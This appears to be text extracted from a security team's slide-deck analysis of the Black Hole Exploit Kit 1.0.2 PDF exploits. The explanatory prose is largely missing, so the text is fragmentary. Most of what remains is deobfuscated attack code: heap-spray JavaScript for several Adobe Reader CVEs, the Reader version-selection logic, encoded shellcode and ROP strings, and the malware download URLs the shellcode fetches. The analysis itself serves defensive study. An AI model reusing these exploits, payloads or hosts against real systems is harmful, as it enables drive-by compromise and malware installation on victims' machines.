Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE , CVE , CVE , CVE

Black Hole Exploit Kit 1.0.2 PDF Exploit Analysis SOFTFORUM Security Analysis Team 1

Black Hole Exploit Kit PDF Exploit $selectedexploit =? 3 or 4 /games/pdf.php /games/pdf2.php CVE-2007-5659, CVE-2008-2992, CVE-2009-0927, CVE-2009-4324, CVE-2010-0188 2

pdf.php ioncube Encoding pdf.php Decode Decoding pdf.php Decoding 3

4

PDF $pdf_script $pdf_template $pdf_script2 5

PDF generate $pdf_script 6

PDF generate $pdf_template 7

$pdf_script $pdf_script $sc $sc 8

$pdf_script var bjsg = '{$sc}'; function ezvr(ra, qy) { while (ra.length * 2 < qy) { ra += ra; } ra = ra.substring(0, qy / 2); return ra; } //v0nsch3lling //CVE-2007-5659 function bx() { var dkg = new Array(); var vw = 0x0c0c0c0c; var addr = 0x400000; var payload = unescape(bjsg); var sc_len = payload.length * 2; var qy = addr - (sc_len + 0x38); var yarsp = unescape(\"%u9090%u9090\"); yarsp=ezvr(yarsp,qy); var count2=(vw-0x400000)/addr; for(var count=0;count<count2;count++){dkg[count]=yarsp +payload;} var overflow=unescape(\"%u0c0c%u0c0c\"); while(overflow.length<44952){overflow+=overflow;} this.collabstore=collab.collectemailinfo({subj:"",msg:overflow}); } 9

$pdf_script //v0nsch3lling //CVE-2008-2992 function printf() { nop=unescape(\"%u0a0a%u0a0a%u0a0a%u0a0a\"); var payload=unescape(bjsg); heapblock=nop+payload; bigblock=unescape(\"%u0a0a%u0a0a\"); headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock +=bigblock;} \r\nfillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.lengthspray);while(block.length+spray<0x40000){block=block+block+fillblock;} \r\nmem=new Array();for (i=0;i<1400;i++){mem[i]=block+heapblock;} \r\nvar num=12999999999999999999888888888888888888888888888888888888888888888888888 8888888888888888888888888888888888888888888888888888888888888888888888888888 8888888888888888888888888888888888888888888888888888888888888888888888888888 8888888888888888888888888888888888888888888888888888888888888888888888888;util. printf("%45000f",num); } 10

$pdf_script //v0nsch3lling //CVE-2009-0927 function geticon() { var arry = new Array(); if (app.doc.collab.geticon) { var payload = unescape(bjsg); var hwq500cn = payload.length * 2; var qy = 0x400000 - (hwq500cn + 0x38); var yarsp = unescape(\"%u9090%u9090\"); yarsp=ezvr(yarsp,qy); var p5ajk65f=(0x0c0c0c0c-0x400000)/0x400000; for(var vqcqd96y=0;vqcqd96y<p5ajk65f;vqcqd96y++){arry[vqcqd96y]=yarsp+payload;} var tumhnbgw=unescape("%09"); while(tumhnbgw.length<0x4000){tumhnbgw+=tumhnbgw;} tumhnbgw="n."+tumhnbgw; app.doc.collab.geticon(tumhnbgw);} } 11

$pdf_script if((lv == 9) ((sv == 8) && (lv <= 8.12))) { geticon(); } else if (lv == 7.1) { printf(); } else if (((sv == 6) (sv == 7)) && (lv < 7.11)) { bx(); } else if ((lv >= 9.1) (lv <= 9.2) (lv >= 8.13) (lv <= 8.17)) { function a() { util.printd('p@111111111111111111111111 : yyyy111', new Date()); } //v0nsch3lling //CVE-2009-4324 var h = app.plugins; for (var f = 0; f < h.length; f++) { if (h[f].name == 'EScript') { var i = h[f].version; } } } } if((i > 8.12) && (i < 8.2)) { c = new Array(); var d = unescape('%u9090%u9090'); var e = unescape(bjsg); while (d.length <= 0x8000) { d += d; } d = d.substr(0, 0x8000 - e.length); for (f = 0; f < 2900; f++) { c[f] = d + e; } a(); a(); try { this.media.newplayer(null); } catch(e) {} a(); 12

$sc $sc GOOGLING jsunpack $sc NWS decoder /lib/sc.php Decode http://jsunpack.jeek.org/dec/go?report=adc1016ee0e23e53ba867e9d3ba16c741f26c509 13

$sc //v0nsch3lling //from http://jsunpack.jeek.org/dec/go?report=adc1016ee0e23e53ba867e9d3ba16c741f26c509 var bjsg='%u9090%u9090%u16eb %u45b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u9134%ue2aa%uc3fa%ue5e8%uffff %u78ff%u909d%u9191%u10cf%ucd7d%u9190%u1891%u1c76%u81de%ufe1c%ua0c5%uc64a %uc2c0%uc2c2%uc2c2%uc2c2%uc2c4%uf9c2%u9095%u9191%uc7c4%uf9c2%ufffe %u9191%ue4f9%ufde3%uc5fc%u1ff9%u9fdf%u797d%u91d9%u9191%u79c1%u91ed%u9191%u416e %u5512%uf999%u7ede%u94de%u79c1%u91fd%u9191%u416e%u5114%u86e4%uc5fb%u62c8%uf93b %u6fe3%u8722%u8c79%u9191%uc191%uc079%u9191%u6e91%uc241%u6ffb%u18f9%u90fe%u792c %u9199%u9191%u79c1%u91ad%u9191%u416e%ua0f1%uf551%uc11a%u1aa1%u9dc3%uc31a %u1a85%ub9e3%u8928%u9191%ua091%ua06e%u3d51%uf0ad%u93ed%ub1bd%u5e50%u909c %u7356%u1061%uca6e%udb2d%u1afb%u81d3%u831a%u48e4%ud518%u8db5%u52f0%u1af1%ub5fd %u1ab5%uadd4%uc51a%ue994%u7b90%udb1a%u1a89%ub1cb %u7a90%ua572%u1ad8%u1aa5%u7f90%u6ea0%u51a0%u3d6d%u5115%u96e5%u5e50%u909c %u7a56%uaa65%ub5ed%ue4b9%u1a70%ub5cb%u7a90%u1af7%uda9d%ucb1a%u908d%u1a7a %u1a95%u7990%ud518%u8db5%u53f0%u9199%u7e79%u6e6f%uf96e%ue5e5%uabe1%ubebe %uf0f7%ue4e7%uf0f7%ue4f5%uf3bf%uf8e3%uf6f5%ue3f4%ufdf4%uf4fc%ubfe3%ue4e3%uf5be%ue1bf %ue1f9%uf7ae%ua3ac%ub7a8%uacf4%u91a4' 14

$sc(shell2exe) shell2exe Packing 0040101B 15

$sc(shell2exe) URL http://favufadu.bridgerelmer.ru/d.php?f=29&e=5 16

$sc(shell2exe) 17

pdf2.php pdf2.php pdf.php jsunpack PDF Exploit PDF exploit 76.76.107.98/games/pdf2.php? f=89 http://jsunpack.eyeprotectiongroup.com/dec/go?report=fd29c743a280d25ca3245dc02a8d990be2ccfe35 18

pdf2.php 19

pdf2.php jsunpack PDF Exploit PDF Exploit Encoding 20

pdf2.php Decoding, Object 5 Javascript khfdskjfg Object 7 <script contenttype="application/x-javascript"> var a = khfdskjfh.rawvalue; no=eval(a.substr(0,3)+'l'); //v0nsch3lling no = eval var azeg='',xk=[]; vtvo=no(a.substr(3,19)); //v0nsch3lling vtvo = String.fromCharCode var davx = a.substr(22).split(','); var dcvt = davx.length / 2; for (var cf = 0; cf < dcvt; cf++) { rd=davx[cf+dcvt] - davx[cf]; azeg += vtvo(rd); //v0nsch3lling azeg += String.fromCharcode(rd) } no(azeg); //v0nsch3lling eval(azeg) --> Execute JataScript </script> 21

pdf2.php khfdskjfg <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/ 1.0/"><xfa:data><yomRote><khfdskjfh>evaString.fromCharCode1387,1248,1285,461,1679,1446,1003,45 3,1607,349,376,452,1338,635,1401,120,1366,554,62,1046,418,1389,204,520,306,1929,1604,1156,320, 1986,1734,60,1586,1019,873,1617,465,1876,422,424,226,798,876,1916,1433,630,388,1152,1184,802, 198,1602,191,754,475,850,1035,431,6,1707,769,1740,1767,355,760,641,1972,1577,869,394,2,1447,15 44,1230,1364,978,212,1752,482,1397,555,680,1351,746,1786,178,1948,821,609,1955,528,1378,47,64 8,85,1159,1289,409,737,510,1155,739,1958,700,321,1322,30,534,1074,512,283,1981,1544,1634,1080, 1330,165,1028,503,774,1335,1383,505,1383,31,942,542,1672,1352,1279,183,507,370,141,1559,692,1 815,1589,1226,1241,101,1861,1223,1997,1495,303,1679,12,1331,182,787,667,1566,1644,402,1949,58 6,944,1622,290,576,1805,798,946,298,357,1990,113,299,1568,1354,752,1429,577,750,1277,1232,429, 1289,916,612,428,1935,530,72,337,479,1011,1281,453,1301,1857,258,451,1156,556,1161,1146,1021, 1812,715,376,564,496,1305,1314,1773,538,96,1063,1806,1060,1491,1741,1590,1916,78,421,1279,171 1,875,932,1921,1485,1736,1077,394,1249,575,1415,1061,1290,143,1625,1787,1801,1292,1912,691,13 88,975,497,448,819,238,390,1087,668,1163,718,379,390,2,300,1876,1738,1729,622,1339,305,37,400, 1947,533,378,1734,334,1670,1647,1025,1410,974,1522,210,145,112,952,1232,780,467,302,1511,858, 305,1812,734,395,1541,1708,1735,198,97,135,146,630,513,1880,1316,535,1879,341,297,1206,215,85 9,1351,679,163,936,1811,631,1238,1323,1489,1895,1135,575,291,1028,283,26,1227,380,161,1373,13 63,1027,1605,679,1914,1837,1373,564,1395,1940,1423,746,620,1939,34,431,570,1625,1754,59,1520, 1241,986,163,622,1621,189,201,1,703,1574,1716,82,1531,396,1996,1720,121,912,1115,61,688,214,10 33,627,248,1465,1197,225,1571,1608,1746,1165,594,261,1787,567,451,1988,568,1506,1914,637,1588 22

pdf2.php khfdskjfg fromcharcode eval(==no) Javascript azeg document.write(azeg) 23

pdf2.php 24

pdf2.php Javascript _AU() _FM() _X() _NO() decoded _G() _UG() _UB() _CR() 25

pdf2.php Heap-Spray Shellcode Spray Shellcode 26

pdf2.php Shellcode 9000 (_AR < 9000) _H = "%u204c%u0f60%u1705%u4a80%u203c%u0f60%u630f %u4a80%ueba3%u4a80%u2030%u4a82%u2f6e %u4a80%u4141%u4141%u0026%u0000%u0000%u0000%u0000%u0000%u0000% u0000%u3912%u4a80%u2064%u0f60%u0400%u0000%u4141%u4141%u4141%u41 41%u83b0%u9090%u16eb %u35b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%ub034%ue2aa %uc3fa%ue5e8%uffff%u59ff%ub1bc%ub0b0%u31ee%uec5c %ub0b1%u39b0%u3d57%ua0ff%udf3d%u81e4%ue76b %ue3e1%ue3e3%ue3e3%ue3e3%ue3e5%ud8e3%ub1b4%ub0b0%ue6e5%ud8e3%u dedf%ub0b0%uc5d8%udcc2%ue4dd%u3ed8%ubefe%u585c %ub0f8%ub0b0%u58e0%ub0cc%ub0b0%u604f%u7433%ud8b8%u5fff%ub5ff %u58e0%ub0dc%ub0b0%u604f%u7035%ua7c5%ue4da%u43e9%ud81a %u4ec2%ua603%uad58%ub0b0%ue0b0%ue158%ub0b0%u4fb0%ue360%u4eda %u39d8%ub1df%u580d%ub0b8%ub0b0%u58e0%ub08c%ub0b0%u604f %u81d0%ud470%ue03b%u3b80%ubce2%ue23b... http://76.76.107.??/d.php?f=89 27

pdf2.php Shellcode 9000 (_AR >= 9000) _H = "%u204c%u0f60%u63a5%u4a80%u203c %u0f60%u2196%u4a80%u1f90%u4a80%u9030%u4a84%u7e7d %u4a80%u4141%u4141%u0026%u0000%u0000%u0000%u0000%u0000%u0000% u0000%u8871%u4a80%u2064%u0f60%u0400%u0000%u4141%u4141%u4141%u41 41%u83b0%u9090%u16eb %u35b9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%ua934%ue2aa %uc3fa%ue5e8%uffff%u40ff%ua8a5%ua9a9%u28f7%uf545%ua9a8%u20a9%u244e %ub9e6%uc624%u98fd%ufe72%ufaf8%ufafa%ufafa%ufafa%ufafc%uc1fa%ua8ad %ua9a9%ufffc%uc1fa%uc7c6%ua9a9%udcc1%uc5db %ufdc4%u27c1%ua7e7%u4145%ua9e1%ua9a9%u41f9%ua9d5%ua9a9%u7956%u6 d2a%uc1a1%u46e6%uace6%u41f9%ua9c5%ua9a9%u7956%u692c%ubedc %ufdc3%u5af0%uc103%u57db%ubf1a %ub441%ua9a9%uf9a9%uf841%ua9a9%u56a9%ufa79%u57c3%u20c1%ua8c6%u41 14%ua9a1%ua9a9%u41f9%ua995%ua9a9%u7956%u98c9%ucd69%uf922%u2299... http://76.76.107.98/d.php?f=89 28

pdf2.php Shellcode Shellcode Access Violation NOP Shellcode URL jsunpack URL 29